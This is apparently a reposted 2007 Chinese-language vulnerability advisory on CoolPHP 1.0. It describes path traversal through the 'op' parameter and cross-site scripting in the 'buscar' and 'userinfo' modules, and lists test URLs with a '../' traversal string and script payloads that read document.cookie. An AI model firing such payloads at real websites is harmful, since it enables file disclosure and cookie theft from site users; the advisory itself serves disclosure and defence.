CoolPHP远程任意文件查看及脚本执行漏洞

发表于:2007-05-25来源:作者:点击数: 标签:脚本CoolPHP任意查看文件
受影响系统: CoolPHP CoolPHP 1.0 描述: CoolPHP是一款基于PHP的网站构建系统。 CoolPHP多处没有正确验证用户提交的输入,远程 攻击 者可以利用这个 漏洞 以WEB进程权限在系统上执行任意命令或进行脚本执行 攻击 。 'index.php'对用户提交给"op"参数的数据
受影响系统:
CoolPHP CoolPHP 1.0
描述:
CoolPHP是一款基于PHP的网站构建系统。

CoolPHP多处没有正确验证用户提交的输入,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令或进行脚本执行攻击

'index.php'对用户提交给"op"参数的数据缺少充分锅炉,提交包含多个'../'的字符作为参数数据,可绕过WEB ROOT限制以系统权限查看文件内容。

另外对'buscar'模块的'query'参数和'userinfo'模块的'nick'参数缺少充分HTML代码检查,构建恶意链接,诱使用户访问,可能泄露用户敏感信息。

<*来源:R00tCr4ck (root@cyberspy.org
  
  链接:_blank>http://www.securitytracker.com/alerts/2004/Oct/1011748.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

R00tCr4ck (root@cyberspy.org)提供了如下测试方法

查看文件内容信息:

http://[victim]/index.php?op=../../../../anotheruser/evilfile


跨站脚本攻击

http://[victim]/index.php?op=buscar&query=<script language=javascript>window.alert(document.cookie);</script>

http://[victi m]/index.php?op=buscar&query=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

http://[victim]/index.php?op=userinfo&nick=<script language=javascript>window.alert(document.cookie);</script>

建议:
厂商补丁:

CoolPHP
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

_blank>http://cphp.sourceforge.net/

原文转自:http://www.ltesting.net